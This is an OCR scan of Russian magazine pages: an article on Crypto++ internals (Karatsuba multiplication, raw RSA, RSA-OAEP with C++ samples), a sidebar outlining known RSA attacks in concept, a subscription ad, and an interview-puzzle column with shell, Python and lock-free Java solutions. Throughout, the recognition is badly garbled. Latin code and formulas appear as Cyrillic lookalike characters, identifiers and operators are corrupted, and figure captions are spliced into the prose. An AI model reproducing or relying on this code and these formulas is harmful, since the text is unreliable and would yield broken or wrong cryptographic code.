и Шенхаге — Штрассена. Все алгоритмы отличаются в первую 
очередь вычислительной сложностью — так, если классическое 
умножение в столбик имеет сложность 0(п'^2) базовых битовых 
операций, то алгоритм Карацубы позволяет осуществлять опера- 
цию умножения со сложностью 0(п'^1,5849), что при больших дли- 
нах чисел дает существенный прирост скорости. Для реализации 
операции умножения целых чисел в Сгур1о++ используется слегка 
видоизмененный алгоритм Карацубы. Умножение двух чисел там 
основано на формуле 

(а + Ьх)(с + сіх) = ас + (ас + ЬсІ - (а - Ь)(с - с1))х + Ьс1х^2 

то есть сводится к умножению и сложению меньших чисел. Число А 
представляется в виде суммы А = А0 + 2^(N/2)*А1 (число длины N 
разбивается на две половинки длиной N/2 каждая), далее вычис- 
ляются необходимые произведения А0*В0, А1*В1, (А0-А1)*(В0-В1). 
Умножение на степени двойки соответствует сдвигу чисел и вы- 
полняется очень быстро. В итоге умножение двух чисел длины 
N сводится к трем умножениям чисел длины N/2 и нескольким 
операциям сложения/вычитания, что дает существенный при- 
рост скорости работы алгоритма (а также указанную выше оценку 



сложности). Необходимые произведения также вычисляются при 
помощи алгоритма Карацубы, так что в итоге умножение проис- 
ходит рекурсивно. В библиотеке Сгуріорр рекурсия продолжается, 
пока длина чисел не уменьшится до восьми слов, после чего в игру 
вступает алгоритм умножения чисел в столбик, который запроган 
на языке ассемблер, причем конкретная реализация алгоритма 
выбирается в зависимости от длины множителей на последнем 
уровне рекурсии. 

В целом код функции умножения, с моими комментариями, 
имеет следующий вид: 

ѵоісі Кесиг5ІѵеМи11:ір1у( 

ыогсі *К. 

ыогсі *Т. 

С0П5І: ыогсі *А. 

С0П5І: ыогсі *В. 

зіге -I: 

// Проверка длины сомножителей: 

// если < 8. то умножаем в столбик 

і-р (М <= з гесигзіопіішіі:’) 



еізе 

{ 

// Делим числа на две половинки (А = А0 + А1*х^ 



// Массив К состоит из четырех кусков 

// длиной N/2 каждый (К[0123]’) 

// К[23] = А1*В1 

КесигзіѵеМи11:ір1у(К2. Т2. А1. В1. М2Ѵ. 

// Т[01] = (А1-А0)*(В0-В1) 

Мс и г5ІѵеМииір1у(Т0. 12, К0. К1 ^ N 2 ) ; 

// К[011 = А0*В0 

Кесиг5ІѵеМи11:ір1ѵ(К0. Т2. А0. В0. N2); 



// Итоговые вычисления в соответствии с приведенной 
// выше формулой, при этом учитывается перенос 

іп-р с2 = Ас1с1(К2. К2, М2Ѵ. 

іп-І: сЗ = с2: 

с2 += Ас1с1(К1^ К2^ К0Д N2); 

сЗ += Ас1с1(К2^ К2д КЗд N21; 



І-Р (аМ2 == ВМ2) 

сЗ -= 5иЫігас1:(К1. К1. Т0. МѴ. 

еізе 

сЗ -н= АсісІ(К1^ КІД Т0Д Ю; 



сЗ += Іпсгетеп1;(К2^ N2^ с2); 

аззегі (сЗ >= 0 && сЗ <= 2Ѵ. 

Іпсгетеп1:(КЗ. N2. сЗѴ. 

} 

} 

Видно, что такой подход дает существенный прирост скорости 
как по сравнению с традиционным умножением в столбик, так и по 



ргпд.5ее{1(5еес1) 

р = рт^.депѳгаіе^гэпбот 

ргпд.а{]е]_гапйотпвв&(Ьіі8) 

Я - рт$.д«гіегаіе_гагісІЁ»п_рі^еО 

М = р*д 

Схема генерации параметров Р5А, приводящая к атаке 
под номером 6 (одинаковым р в разных М) 



отэг*0; 

{ егГйг ЕІ - дйій } 

(атот » 1; 9аісмі»<; } 



Схема реализации ОДЕР, приводящая кТігпіпд аИаск 
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сравнению с классическим алгоритмом Карацубы (подробнее об 
алгоритме: ооо.ді/гААкЕ ). 

ВОЗВЕДЕНИЕ В СТЕПЕНЬ И ДЕЛЕНИЕ С ОСТАТКОМ 

Здесь тоже нет ничего необычного. Возведение в степень с приве- 
дением по модулю осуществляется при помощи известного метода 
квадратов, при этом каждый раз происходит приведение результа- 
та по модулю (деление с остатком). Вкратце суть метода квадра- 
тов такова: если надо возвести число т в степень е, то сначала 
получается двоичное представление числа е=(е[к], е[к-1], 
е[0]) = е[к]*2^к + ... + е[1]*2 + е[0]. Тогда алгоритм быстрого 
возведения в степень имеет вид: 

5[1] = т 

-Рог і = 1,2 к 

5[і+1] = (5[і]^2^*ш^(к-і^ 

Таким образом, количество умножений, необходимых для 
возведения числа в степень п, равно 0(1од п). В большинстве 
алгоритмов с открытым ключом используется возведение 
в степень с приведением по модулю (делением с остатком на 
определенное число). В Сгур1о++ операция приведения по 
модулю применяется после каждого умножения, что позволяет 
уменьшить длины чисел, над которыми производятся арифмети- 
ческие операции. Для реализации операции приведения числа 
по модулю используется широко распространенный алгоритм 
Евклида ( доо.дІ/дк2рі ). 

АЛГОРИТМ ШИФРОВАНИЯ Р5А 

Алгоритм Р5А был разработан в 1980-х годах тремя исследова- 
телями: Рональдом Ривестом (РопаИ Ыпп Ріѵезі), Ади Шамиром 
(Асіі ЗЬатіг) и Леонардом Эдлменом (ЕеопагсІ АсИетап). В настоя- 
щий момент Р5А является одним из самых популярных алгорит- 
мов шифрования с открытым ключом и выработки электронной 
цифровой подписи. Принцип работы Р5А основан на использо- 
вании однонаправленной функции слазейкой (опе-ѵѵау Ігарсіоог 
І^ипсЛоп), то есть функции, значение которой вычисляется легко, 
но обращение которой без знания секрета (лазейки) практиче- 
ски невозможно. В алгоритме Р5А в качестве Ігарсіоог І^ипсЛоп 
используется функция возведения в степень по модулю большо- 
го числа: 

X -> х^е тосі N 



где N = р*д — произведение двух больших простых чисел. 

АЛГОРИТМ РАѴѴР5А 

Сначала я расскажу, как устроен простой алгоритм Р5А, так на- 
зываемый РаѵѵРВА. Данный алгоритм в чистом виде в практике 
не используется из-за наличия большого количества уязвимостей 
(речь о которых пойдет ниже), а также из-за того, что не позво- 
ляет безопасным образом осуществлять шифрование больших 
сообщений. Тем не менее РаѵѵРВА является основой широко 
распространенных на практике систем Р5А-0АЕР, Р5А-0АЕР+, 
Р5А-5АЕР+ и так далее. Алгоритм РаѵѵРВА работает следующим 
образом: сначала выбираются два больших простых числа р и д, 
путем произведения которых формируется модуль М=р*д, а также 
значение функции Эйлера р(М) = (р-1)(д-1). Далее выбираются два 
числа е и б, так, что выполняется соотношение е*б = 1 тоб р(М). 
Пара (е, М) является открытым ключом алгоритма, а (б, М) — се- 
кретным. Иногда в качестве секретного ключа рассматривают (б, 
р, д). Шифрование сообщения т (1 <= т < М) при помощи открыто- 
го ключа (е, М) осуществляется следующим образом: 

5 = ш^е тоб N 



Для расшифрования в при помощи секретного ключа (б, М) и по- 



лучения исходного сообщения т необходимо провести подобную 
процедуру: 

ш = 5^6 тоб N 



КОДИНГ РАѴѴР5АІ 

Программировать процедуру зашифрования/расшифрования 
алгоритма РаѵѵРЕА будем с использованием криптографического 
фреймворка Сгур1о++ (РаѵѵРЕА в данном фреймворке по понятным 
причинам не реализован). Функция зашифрования имеет вид: 

Іп1:е§ег& КаыК5аЕпсгур1:(Іп1:е§ег& ш. Іп1:е§ег& N. Іп1:е§ег& е) 

{ 

К5А: : РиЫісКеѵ риЬКеѵ; 

риЬКеѵ.Іпі1ііа1І2е(М. е); 

(риЬКеу .Арр1уРипс1;іоп(т) ) ; 

} 

Как видишь, ничего сложного нет — все в соответствии с опи- 
санным выше алгоритмом. Алгоритм расшифрования чуть сложнее: 

Іп1;е§ег& КаыК5а0есгур1;(Іп1;е§ег& 5^ Іп1;е§ег& 

Іп1;е§ег& е^ Іп1;е§ег& б) 

{ 

К5А: : РгіѵаІіеКеу ргіѵКеу; 

Аи1;о5еебебКапботРоо1 ргп§; 

ргіѵКеу . Іпі1;іа1І2е(М^ е^ б); 

геііигп (ргіѵКеу.Са1си1а1;еІпѵег5е(ргп§^ в)); 

} 

Вообще говоря, есть два пути реализации алгоритма рас- 
шифрования РаѵѵРЗА: первый — возведение в (зашифрованного 
сообщения) в степень б по модулю М, а второй — извлечение корня 
степени е из в по модулю N. Метод Саісиіаіеіпѵегве реализует 
второй описанный способ, особенностью которого является то, что 
в нем не используется б, а используются только числа е, р, д. Ты, 
наверное, сразу же спросишь — откуда он знает числа р и д, на что 
я тебе отвечу, что они получаются путем факторизации N в методе 
ІпіІіаІІ 2 е (факторизация проводится легко при известных е и б). 

АЛГОРИТМ Р5А-0АЕР 

Как я уже сказал ранее, алгоритм РаѵѵРЗА является уязвимым 
относительно большого количества атак, и поэтому в 1994 году 
двое исследователей Михир Белларе (МіЫг ВеІІаге) и Филип 
Рогуэй (РЫІІір Родаѵѵау) предложили новую схему использова- 
ния алгоритма Р5А, которая получила название ОАЕР — Оріітаі 
АвуттеШіс Епсгурііоп Раббіпд. Данная схема лежит в основе 
стандарта РКС5#1 (последняя версия ѵ2.0) и в настоящее время 
применяется практически повсеместно. Прежде чем перейти 
к описанию данной схемы, следует сказать пару слов о том, 
как на практике применяются шифры с открытым ключом. По 
скорости обработки информации асимметричные шифры сильно 
проигрывают симметричным, и это одна из причин того, что 
алгоритмы шифрования с открытым ключом не используются 
в одиночку. Обычно процесс шифрования построен по следую- 
щей схеме: сначала случайным образом вырабатывается ключ 
симметричного шифра, при помощи которого осуществляется 
шифрование сообщения, а затем данный ключ шифруется на 
открытом ключе асимметричного алгоритма. Данный подход 
позволяет достичь высокой скорости обработки информации 
и повысить стойкость схемы шифрования. Схема Р5А-0АЕР как 
раз и служит для стойкого шифрования ключей симметричных 
алгоритмов. В принципиальном плане Р5А-0АЕР отличается от 
РаѵѵРБА функцией подготовки сообщения. При использовании 
Р5А-0АЕР сообщение (например, ключ АЕ5 длиной 128 бит) сна- 
чала дополняется до длины, равной длине числа М, следующим 
образом: 
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ш II 01 II 00000. . . II гапсі 

где гапсі — случайные данные. Затем при помощи двух хеш- 
функций Н и 0 происходит подготовка открытого текста: 

((т II 01 II 00000...) хог гапсі Н(гапсІ)) || 

(гапсі хог е(гп5§ II 01 || 00...)) 

После полученный открытый текст зашифровывается алго- 
ритмом РаѵѵРЗА. Довольно часто в качестве хеш-функций Н и С 
используется алгоритм хеширования 5НА-256, который явля- 
ется стандартом в США. Схема Р5А-0АЕР, используемая вместе 
с алгоритмом АЕ5, называется Р5АЕ5-0АЕР и уже реализована 
в криптографическом фреймворке Сгур1о++ в виде классов Р5АЕ5_ 
0АЕР_Епсгур1ог и Р5АЕ5_0АЕР_0есгур1ог, которые предназначены 
для зашифрования и расшифрования соответственно. В качестве 
примера напишем код, который зашифровывает и расшифровыва- 
ет сообщение: 

// Генерация ключей 

Аи1іо$еесІесІКапсІотРоо1 гп^; 

Іпѵег1:іЫеК$АРипс1:іоп рагат е1:ег5 ; 

рагате1;ег5 .Сепега1;еКапсІот1лІі1;ІіКеу5І2е( гп§^ 1536 ); 

К5А: : РгіѵаІіеКеѵ ргіѵа1:еКеѵ( рагате1:ег5 ); 

К5А: : РиЫісКеу риЫісКеу( рагате1:ег5 ); 



// Блок открытого текста 128 бит 
5І:а1:іс сопзі: іп1: 5ЕСКЕТ 5І2Е = 16; 



5есВѵ1іеВ1оск р1аіп1:ех1:( 5ЕСКЕТ 5І7Е ); 
теіті5е1:( р1аіп1:ех1:. 'А'. 5ЕСКЕТ 5І7Е ); 



К5АЕ5_ОАЕР_5НА_Епсгур1;ог епсгур1;ог( риЫісКеу ); 



// Память под шифртекст 

5І2е 1: есі = епсгур1;ог.СірІіег1;ех1;Іеп§1;Іі(р1аіп1;ех1;.5І2е()) ; 
5есВу1:еВ1оск сірііег1;ех1;( есі ); 



// Зашифрование 

епсгурііог. Епсгур1і( гп^. 

р1аіп1:ех1:. 

р1аіп1іех1:.5І2еП . 
сірііег1:ех1: ) ; 



К5АЕ5_ОАЕР_5НА_Ресгѵр1:ог сІесгѵр1:ог( ргіѵаІіеКеѵ ); 



// Память под результат расшифрования 

5І2е 1: сірі = сІесгур1;ог.МахР1аіп1:ех1;Іеп§1;Іі( 

сірііег1:ех1:. 5І2еП ); 

5есВу1;еВ1оск гесоѵегесІ( сІрІ ); 



РесосІіп^КеБиІІ: гезиН: = сІесгѵр1:ог.Ресгѵр1:( гп^. 

сір|^ег1;еx1;^ сірііег1;ех1; . 5І2е( ) ^ гесоѵегесі ); 

Как видно, указанные классы довольно легко использовать. 
Также хочу отметить, что в фреймворке СгурІо++ возможно орга- 
низовать поблочную обработку открытого текста, что может быть 
полезно при обработке больших объемов информации. 

ЗАКЛЮЧЕНИТ 

Вот и все — теперь ты имеешь представление о внутренностях 
криптографического фреймворка Сгуріорр, алгоритмах работы 
с большими числами, работе вариантов алгоритма Р5А. Вообще, 
в фреймворке Сгуріорр реализовано довольно большое количество 
алгоритмов и он весьма удобен, так что смело используй его в сво- 
их целях — это будет быстрее, удобнее и безопаснее, чем собствен- 
норучная реализация алгоритмов шифрования. ^ 



гтш 



АТАКИ НА АЛГОРИТМ К5А 



И Первая и самая классическая атака — попытка 

разложения на множители числа N. В случае успеха 
можно восстановить все секретные ключи и расшифровать 
все сообщения. 

Довольно часто для ускорения операции зашифрования 
применяют маленький открытый ключ. Это может 
привести к ситуации (в случае большого М), когда в операции 
зашифрования ггі'^е < М, что влечетза собой отсутствие тосі 
М, то есть злоумышленник просто может извлечь корень 
степени е из числа т'^е и получить сообщение в открытом 
виде. Рекомендуемое минимальное значение открытого 
ключа е = 2'^16 + 1. 

Бывает, что для ускорения операции расшифрования 
выбирают маленький секретный ключ сі, что делает 
возможным как его перебор, так и проведение атаки, 
предложенной Михаэлем Винером (МісИаеІ 1. ѴѴіепег). Вообще 
алгоритм Р5А небезопасен в случае сІ < N'^0,25. 

Существует класс так называемых Тітіпд-атак, 
которые позволяют злоумышленнику, замеряя время, 
необходимое для расшифрования сообщения, восстановить 
значение секретного ключа сІ. Точно также исследователем 
Полом Кочером (РаиІ КосИег) в 1999 году была предложена 
атака на реализацию алгоритма Р5А на смарт-картах. Суть 
атаки состоит в измерении количества энергии, потребляемой 
чипом в ходе расшифрования. Данная атака получила 
название Роѵѵег аііаск. 



РаиК аМаск — атака на реализацию алгоритма Р5А. 
Иногда для ускорения работы используют процедуру 



расшифрования, основанную на так называемой китайской теореме 
об остатках. Малейшая ошибка в данной процедуре приводит 
к возможности разложения на множители числа М, что полностью 
компрометирует секретные ключи. Чтобы этого избежать, после 
расшифрования дополнительно проверяют проведенную операцию 
на наличие ошибок, однако это приводит к потере 15% скорости 
работы, что иногда довольно существенно. 

Неверная генерация ключей. Достаточно часто при 
генерации ключей Р5А используется программный 



генератор псевдослучайных чисел, который принимает на 
вход некоторое случайное значение зеесі. Из-за недостатка 
случайности некоторые параметры р и ^ у разных наборов 
ключей могут оказаться одинаковыми, что приводит 
к разложению соответствующих чисел N1 и N2 на множители. 
Два независимых исследователя Надя Хенингер (Ма- 
сііа Непіпдег) и Арьен Ленстра (Аг]еп Іепзіга) провели 
эксперименты, в которых им при помощи данной уязвимости 
удалось факторизовать параметры N из 0,4% всех доступных 
открытых ключей НТТРБ-серверов. 

Некорректная реализация длинной арифметики. 
Ошибки в реализации могут привести как 



к компрометации секретного ключа и значении р и д, так и к 
возникновению различных атак, связанных с побочными 
каналами утечки информации. 



• Факторизация — 
разложение 
числа на простые 
множители. 
Доказательство 
существования 
или отсутствия 
быстрого алгоритма 
факторизации 
произвольного 
числа является 
большой научной 
проблемой. 

• Операция 
приведения 
по модулю — 
получение остатка 
отделения одного 
числа на второе. 

• РКС5 — РиЫіс 
Кеу СгурІодгарЬу 
ЗІапсІагсІ — группа 
стандартов, 
разработанная 
компанией КЗАОаІа 
Зесигііу. 
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ПОДПИШИСЬ! 



8-800-200-3-999 

л-1 (495) тЪ-^2-11 (бесплатно) 



Редакционная подписка без посредников — это 
гарантия получения важного для Вас журнала 
и экономия до 40% от розничной цены в киоске. 




6 номеров — 564 руб. 

1 3 номеров — 1105 руб. 



6 номеров — 599 руб. 

1 2 номеров — 1188 руб. 



6 номеров — 1110 руб. 
12 номеров — 1999 руб. 



6 номеров — 810 руб. 

12 номеров — 1499 руб. 







6 номеров — 775 руб. 

12 номеров — 1399 руб. 



3 номера — 630 руб. 

6 номеров — 1140 руб. 



6 номеров — 895 руб. 

12 номеров — 1699 руб. 



6 номеров — 690 руб. 

12 номеров — 1249 руб. 






6 номеров — 1110 руб. 
12 номеров — 1999 руб. 



6 номеров — 1110 руб. 
12 номеров — 1999 руб. 



6 номеров — 950 руб. 

12 номеров — 1699 руб. 



(дате)іаті 

зНор.дІс.ги 
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Павел Александрович [іѵіпзісІе.ЫодБроІ.сот] 
Александр Латушкин (аІехйзкаіоДпед.ги) 




© 




Задачи 
на собеседованиях 



ПОДБОРКА ИНТЕРЕСНЫХ ЗАДАНИЙ, КОТОРЫЕ 
ДАЮТ НА СОБЕСЕДОВАНИЯХ 



И снова на страницах журнала мы разбираем каверзные задачки с собеседований. Сегодня в нашем 
выпуске как фундаментальные вопросы нажатия на клавишу <Еп1:ег>, так и сугубо практические 
аспекты применения ^аѵа, Руібоп и утилит командной строки Ыпих. Будет интересно! 



Задача №1 



|УСЛ0ВИЕ| Что происходит, когда пользователь вбивает адрес 
В адресную строку браузера (от момента нажатия кнопки <Еп1ег> 
до момента отображения страницы)? 



РЕШЕНИЕ В момент нажатия клавиши <Еп1ег> слышен харак- 
терный щелчок, и наше представление начинается! Встроенный 
в клавиатуру контроллер тут же определяет координаты замкну- 
того элемента на плате (каждая клавиша замыкает определенные 
контакты), формирует и передает на материнскую плату пакет 
с данными, содержащий скан-код клавиши. Далее эта информация 
магическим образом доходит до центрального процессора, а затем 



и до операционной системы с браузером. Браузер понимает, что 
ему нужно обработать нажатие клавиши <Еп1ег> и запускает сле- 
дующую череду неизбежных событий. 

Процесс браузера создает клиентский сокет для отправки дан- 
ных. Однако адрес в браузере не позволяет определить, к какому 
серверу нужно совершить запрос. Для этого нужно знать ІР-адрес 
сервера. И здесь нам поможет протокол 0М5, с его помощью дела- 
ется специальный запрос к 0М5-серверу типа «скажи мне, какой ІР 
у сервера с адресом зііе.ги», и теперь мы в состоянии соединиться 
с целевым сервером. 

Если в строке браузера был введен адрес без различных до- 
полнений в виде протокола (Ьир://5ІІе.ги) или порта (зіІе.гиіВІ), то по 
умолчанию соединение происходит к 80-му порту по НТТР-протоколу. 
Это можно смоделировать, набрав в консоли такую команду: 
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Задачи на собеседованиях 



$ 1:е1пе1: 5І1:е.ги 80 
6ЕТ / НТТР/1.1 
Но5Іі: 5І1:е.ги 



Здесь мы с помощью метода СЕТ запрашиваем содержимое 
главной страницы сайта зііе.ги. На самом деле это только мини- 
мальный запрос, в реальной жизни запросы идут с большим чис- 
лом параметров, таких как ІІзег-АдепІ, Ассері, Соппесііоп и других. 
Их можно просмотреть через плагин Ыѵе НТТР Неасіегз к РігеІ'ох, 
например. И если все хорошо, то нам приходит ответтипа «НТТР/1.1 
200 Ок» с содержимым запрошенной страницы, которая и появля- 
ется в браузере на основе многочисленных стандартов для отобра- 
жения того или иного кода, присутствующего на странице. 



Задача №2 



[условие I Перед вами пример части ассезз-лога веб-сервера, 
на котором работает сервис Яндекс. Погода. 



[10/3и1/2010:00:13:18 +0400] ро§ос1а .уапсіех. ги 2. 2. 2. 2 "СЕТ 
/сІіегпі§оѵ НТТР/1.1" 200 "Іі1:1:р://ыыы.уапсіех. иа/" 
"Мо2І11а/4.0 (сошраІііЫе; М5ІЕ 8.0; Ілііпсіоыз МТ 5.1; 

ТгісІеп1:/4.0Г 113 

[10/3и1/2010:00:13:19 +0400] ро^осіа . ѵапсіех. ги 3.3. 3.3 "6ЕТ 
/гиззіа НТТР/1.1" 200 "Іі1;1;р://ро§осІа.уапсІех.ги/27612/ 
сііоозе/" "Орега/9.52 (Ілііпсіоыз МТ 6.0; У; МКА 5.5 
(ЬиіІУ 02842); ги)" 119 

[10/3и1/2010:00:13:20 +0400] ро§осІа .уапсіех. ги 5. 5. 5. 6 "СЕТ 

/ НТТР/1.1" 302 "Іті:1:р://ыыы.уапсіех.ги/" 

"Мо2І11а/4.0 (сошраІііЫе: М5ІЕ 8.0; Ілііпсіоыз МТ 6.1; 1лІ01лІ64; 
ТгісІеп1;/4.0; 51СС2; .МЕТ СЕК 2.0.50727; .МЕТ СЕК 3.5.30729; 
.МЕТ СЕК 3.0.30729; ІпТоРаІіІі . 2) " 203 



Любым удобным для вас способом определите, пожалуйста, для 
полного лога из нескольких миллионов строк: 

1 . Топ-3 рефереров, с которых перешли на главную страницу сер- 
виса (/) или на страницу с прогнозом погоды в Москве (/тозсоѵѵ), 
и числотаких переходов; 

2 . В какое времяуложилось95%запросов (время ответа в миллисе- 
кундахуказано в последнем столбце каждой строки) для страниц 
с прогнозом погоды в Киеве (/кіеѵ). 



РЕШЕНИЕ 1. Для разнообразия я решу эту часть задания исклю- 
чительно с помощью стандартных утилит командной строки Еіпих. 
Начнем с того, что нам нужно отфильтровать из всего лога только те 
строки, в которых переходили на главную страницу сервиса (/) или на 
страницу с прогнозом погоды в Москве (/тозсоѵѵ). Фильтровать будем 
по таким подстрокам: «6ЕТ / НТТР/1.1» и «6ЕТ /тозсоѵѵ НТТР/1.1». Это 
позволяет сделать утилита едгер, ей можно передать в качестве усло- 
вия две эти подстроки, разделенные оператором I (или). 

После этого нам нужно выделить из имеющихся строк значе- 
ние реферера. Заметим, что каждую строку можно поделить на 
составляющие части, и в качестве разделителя возьмем пробел 
(это не совсем правильно, так как в формате ассезз.Іод есть поля, 
в которых может быть неопределенное число пробелов, например 
ЕІзег-АдепІ, но в нашем случае он идет после реферера, поэтому 
значения не имеет). Тогда реферер окажется девятым словом 
в этом импровизированном предложении, сразу же перед началом 
ЕІзег-АдепЕ Это мы проделаем с помощью утилиты сиі (альтерна- 
тивные варианты — аѵѵк, зеб). 

Далее нам нужно понять, сколько раз встречается каждый 
реферер в полученном выводе. Здесь понадобится связка из ути- 
лит зогі и ипід. Вторая позволяет понять, сколько повторяющихся 
строчек содержит вывод, а первая отсортирует инфу для возникно- 
вения этих самых повторов. 

И наконец, заюзаем утилиту Ьеаб для вывода только первых 



трех строчек нашего топа. В итоге получаем такой чудесный 
парсер-однострочник: 

е§гер 'СЕТ / НТТР/1.і|СЕТ /тозсоы НТТР/1.1' ./ассезз.Іод 
I си1: -б ' ' -Т 9 I зог1: | ипід -с | беаб -3 

2. Вторуюжечастьзаданияя позволю себе решить, прибегнув к по- 
мощи языка РуНпоп: 

Ііітеіізі: = [] 

# Построчно считываем лог 

-Рог Ипе іп ореп( ' ассезз . 1о^ ' ) : 

# Учитываем только запросы для погоды в Киеве 

і-р 'СЕТ /кіеѵ НТТР/1.1' іп Ипе: 

# Делим строку на слова 

Ипе = 1іпе.зр1і1:( ' 

# Добавляем в список время ответа для каждого запроса 

1ііпіе1І5І:.аррепб(1іпе[-1] .зІігірП) 



# Сортируем список с временем откликов 

1ііте1І5І:.50г1:П 

# и выводим на экран тот элемент, который последний 

# уложился в 95% элементов списка по возрас танию 

ргіпі: 1ііпіе1І5І:[іп1:(1еп(1:іпіе1І5І:) * 0.95)] 

Задача №3 

УСЛОВИЕ I Напишите на баѵа Іоск-^гее реализацию класса с ме- 
тодом Відіпіедег пехД), который возвращает элементы последова- 
тельности Фибоначчи. Код должен корректно работать в многопо- 
точной среде. 



С числами Фибоначчи все достаточно просто. Числа 
элементы числовой последовательности 0, 1, 1, 2, 3, 

5, 8, 13, ..., в которой каждое последующее число равно сумме двух 
предыдущих чисел. Более формально последовательность чисел 
Фибоначчи Р(п) задается линейным рекуррентным соотношением 

Р(0) = 0, Р(1) = 1 ^ Р(п) = Р(п - 1) + Р(п - 2), п >= 2 

Ясно, что Р(п - 1) и Р(п - 2) — состояние, разделяемое между по- 
токами, и необходимо обеспечить корректную работу с ним. Тради- 
ционно для этих целей используются блокировки (зупсЬгопігеб или 
]аѵа.иІіЕсопсиггепЕІоскз.Еоск), но в данном случае нам необходима 
Іоск-І^гее-реализация. Если оставить в стороне академизм, то Іоск- 
І^гее-алгоритмы — класс алгоритмов, для которых гарантируется 
прогресс выполнения по крайней мере одного потока. Например, 
если бы мы реализовали этот метод с использованием традици- 
онных блокировок, то была бы возможна ситуация, когда поток, 
захвативший блокировку, был бы остановлен операционной систе- 
мой, а остальные потоки ждали освобождения этой блокировки. 
Прогресса выполнения задачи нет. 

Вместо этого мы используем следующий подход: 

1 . Прочтемтекущеесостояние. 

2 . Выполним необходимую работу. 

3 . Попробуем атомарно опубликовать результат с помощью СА5 
(сотрагеАпб5ѵѵар/сотрагеАпб5еі) операции. 

4 . В случае неудачи — повторим шагі. 

Такой алгоритм часто используется в ситуациях, когда по 
каким-то причинам блокировка нежелательна и не критична по- 
теря в производительности на повторной работе. 

Центральным элементом в работе этого алгоритма является 
операция сотрагеАпсІБѵѵар (в современных процессорах она реа- 
лизована аппаратно), алгоритм работы которой показан ниже на 
примере целых чисел: 



РЕШЕНИЕ 

Фибоначчи — 



ХАКЕР 07/162/2012 



087 





кодинг 



Ьооіеап сотрагеАпсІ$е1:(іп1: 5І:оге. 

іг.-!: ехресііесі. 

пеыѴаІие) 

{ 



і-р (5І:оге == ехресІіесП { 
5І:оге = пеыѴаІие: 

} 0І50 { 

геііигп -Раізе; 



I 

і 



Дополнительным свойством этой операции является то, что она 
выполняется атомарно (грубо говоря, другие потоки не могут из- 
менить значение зіоге, пока выполняется эта операция). 

В языке ^аѵа присутствуют «обертки» для этой операции, кото- 
рую мы и будем использовать. 

Начиная с версии 1.5 в ^аѵа появился пакет )аѵа.иІіІ. 
сопсиггепі.аіотіс, который содержит классы АіотісВооІеап, 
Аіотісіпіедег и так далее; в них реализованы методы, аналогич- 
ные СА5 и опирающиеся на него в своей работе (сотрагеАпсІБеІ, 
іпсгетепіАпсІбеІ и другие). По некоторым причинам отсутствует 
класс АіотісВідІпІедег, кроме того, в нашем случае нам не- 
обходимо хранить две переменные (Р(п - 1), Р(п - 2)) и обнов- 
лять их значение атомарно. Эту проблему мы решим, объявив 
внутренний класс, в котором будет храниться состояние нашей 
последовательности, и используем класс АіотісРеІ'егепсе для 
атомарного обновления. 

;Ы іс с1а55 ІоскРгееРіЬ { 

// ітти1:аЫе-класс для хранения Р(п - 1) . Р(п - 2) 

// нашей последовательности 

ргіѵаііе 5І:а1:іс сіазз РгеѵРіЬМишЬегз { 

// Дл я корректной публикации полей в многопоточном 

// окружении сделаем их бпаі 

ргіѵаііе бпаі Ві§Іп1іе§ег сиггепІіМит Ьег : 

ргіѵаііе бпаі Ві^Іпіе^ег ргеѵМитЬег: 



ргоііесііесі РгеѵРіЬМитЬег5(Ві§Іп1іе§е г сиггепііМ итЬег . 

Відіпіедег ргеѵМи шЬе г) { 

5Црег() ; 

ІІІ1І5 . сиггепІіМ ипіЬег = сиггепіі МитЬег : 

ІІІ1І5 . р^еѵN ип1Ье^ = ргеѵNитЬег^ 

і 



/ / Вычисляем следующее значение нашей 

// последовательности и создаем новы й экземпля р 

// РгеѵРіЬМишЬегз для их хранения 

риЫіс РгеѵРіЬМ ишЬегБ са1си1а1іеМех1і( ) { 

геііигп пеы РгеѵРіЬМитЬег5( 

сиггепііМитЬег . асІсІ(ргеѵМитЬег) . сиггепііМитЬег) ; 

} 

і 



ргіѵаііе Аііотіс Ке-Регепсе<РгеѵРіЬМитЬег5> зііаііе = 

пеы АііотісКе-Регепсе<РгеѵРіЬМитЬег5>(' 

пеы РгеѵРіЬМишЬегБСВі^Іпііе^ег .ОМЕ . Ві§Іпііе§ег.2ЕК0)) ; 





* Вычисля ем следующее значение пос л едовательности 

* Фибонач чи в соответствии с описатіным выше алгоритмом 

*/ 

риЫіс Ві^Іпііе^ег пехііП { 

РгеѵРіЬМитЬегз сиггепіі = пиіі; 

РгеѵРіЬМишЬегБ пехіі = пиіі : 

{ 

// 1. Прочтем текущее состоя ние 

сиггепіі = зііаііе. ^еііО : 



// 2. Выполним необходимую работу 

пехіі = сиггепіі. саІсиІ аііеМехііП : 

// 3. Попробуем атомарно опубликовать результат 

// с помощью СА5-операиии 

// 4. В случае неудачи - повторим шаг 1 

} ыІіі1е( ! Бііаііе. сотрагеАпсІ5еіі(сиггепіі^ пехіі) ) ; 

// Возвращаем очередное значение последовательности 

// Фибоначчи 

геііигп сиггепіі. ргеѵМитЬег; 



} 



Очевидно, что, даже если один из потоков будет остановлен 
планировщиком операционной системы, работа остальных по- 
токов от этого не остановится. И даже «промах» операции СА5 
(и повторное выполнение работы) говорит только о том, что работа 
в каком-то другом потоке успешно завершилась. 



Задача №4 

УСЛОВИЕ I В волшебной стране жили мужественные рыцари, 
свирепые драконы и прекрасные принцессы. Рыцари убивают 
драконов, драконы съедают принцесс, а принцессы изводят до 
смерти рыцарей. Всего было 100 рыцарей, 99 принцесс и 101 дра- 
кон. Древнее заклинание, наложенное на всех, запрещает уби- 
вать тех, кто погубил нечетное число жертв. В настоящее время 
в этой стране остался всего один житель. Кто это и почему? 



РЕШЕНИЕ Как может показаться на первый взгляд, задача 
весьма запутанная, но мы будем рассуждать без лишних за- 
морочек. В условии значится: рыцари убивают драконов. Если 
рыцарь никого не убил, то, стало быть, его можно убивать. 
Смекнем, что самый крайний вариант тут — один рыцарь 
убивает 100 драконов, тогда всех рыцарей можно убить. 
Имеем: 100 рыцарей, 99 принцесс и дракон. Теперь пусть одна 
принцесса изведет всех рыцарей — в итоге ее можно съедать, 
как и других принцесс. Имеем: 99 принцесс и дракон. Вывод 
прост: дракон съедает 99 принцесс и остается единственным 
жителем. Ответ: дракон. 



В СЛЕДУЮЩЕМ ВЫПУСКЕ 



1. У вас есть наемный рабочий и кусок золота, разделенный на семь 
соединенных сегментов. Вы должны давать рабочему по одному 
сегменту золота вдень. Как оплатить ему семь рабочих дней, если 
отломать от куска золота можно только дважды? 

2. На базу завезли 100 килограммов свеклы. Содержание воды в све- 
кле 99%. Через некоторое время свекла подвяла и содержание 
воды в ней стало 98%. Сколько стала весить свекла? 

